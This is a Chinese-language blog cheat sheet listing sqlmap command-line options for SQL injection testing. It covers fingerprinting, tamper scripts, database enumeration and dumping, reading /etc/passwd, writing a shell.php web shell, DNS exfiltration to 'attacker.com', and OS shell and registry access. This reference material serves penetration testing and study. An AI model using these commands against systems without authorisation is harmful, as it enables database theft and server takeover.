sqlmap
sqlmap -u “url” -p 参数 -f 指纹信息
sqlmap参数
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49
| --dbms "数据库类型" --os "linux" --invalid-bignum、 --invalid-logical --no-cast --no-escape --prefix/--suffix --tamper -D security --tables -T 指定表 -C 指定列 -p ”user-agent,referer“ -u “url" -f ”数据库管理系统指纹信息" --users "数据库账号" --banner "版本号“ --schema "数据库源数据" -a ”查询所有" -d "用户数据库类型://用户名:密码@ip:port/数据库" -m 文本文件名 --dbs 数据库 -g "inurl:\".php&id=1\"" 扫描谷歌搜索结果 -r 指定post包 --force-ssl -c 配置文件 --data "参数" --param-del 分隔符 --cookies cookie --level 2 --user-agent "用户头" --random-agent /usr/share/sqlmap/txt/user-agents.txt --level 3 --host "host头" --referer "refer头" --headers "头" --method=GET/POST --auth-type Basic --auth-cred "user:pass"
--auth-cert/ --auth-file "名称" --proxy="http://127.0.0.1:8087" --proxy-cred="name:pass" --ignore-proxy --delay 5 --timemout 5 --retries 3 --randomize --scope "正则" --safe-url/--safe-freq "次数" --skip-urlencode --eval=“import hashlib;hash=hashlib.md5(id).hexdigest()" #每次请求执行前指定python代码
|
sqlmap优化
1 2 3 4 5
| --predict-output --keep-alive --null-connection --threads -o
|
获取混淆脚本
1
| dpkg -L sqlmap | grep tamper
|
Detection
1 2 3
| --level 1-5 --risk 1-4 --string,--not-string,--regexp,--code,--text-only,--titles
|
techniques
B: 布尔盲注
E: 基于报错的注入
U: 联合查询
S: 堆叠查询
T: 时间盲注
1 2 3 4 5
| --time-sec 5 --union-cols 6-9 --union-char --dns-domain attacker.com --second-order http://1.1.1.1/b.php
|
enumeration
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55
| –current-user
–current-db
–hostname
–users
–privileges -U username
–roles
–dbs
–D:dvwa
–tables
-exclude-sysdbs
-T –columns
-C
–schema
–batch
–count
–dump
–dump -T 表 -D 数据库 --start 开始列 --stop 结束列
–dump-all --exclude-sysdbs
–sql-query
|
udf injection
1 2
| --udf-inject,--shared-lib
|
fileSystem
1 2
| --file-read="/etc/passwd" --file-write="shell.php" --file-dest "/tmp/shell.php"
|
os
1 2 3
| --os-cmd --sql-shell --os-shell
|
windows registory
1 2 3 4
| --reg-read --reg-add --reg-del --reg-key,--reg-value,--reg-data,--reg-type
|
general
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
| -s -t --charset=GBK --crawl --batch --crawl=3 --csv-del --dbms-cred --flush-session --force-ssl --fresh-queries --hex -v 3 --output-dir=/tmp --parse-errors --save -z bat
|
miscellaneous
1 2 3 4 5 6 7 8
| --answer --check-waf --hpp --identify-waf --mobile --purge-output --smart --wizard
|
本文作者:NoOne
本文地址: https://noonegroup.xyz/posts/6d771160/
版权声明:转载请注明出处!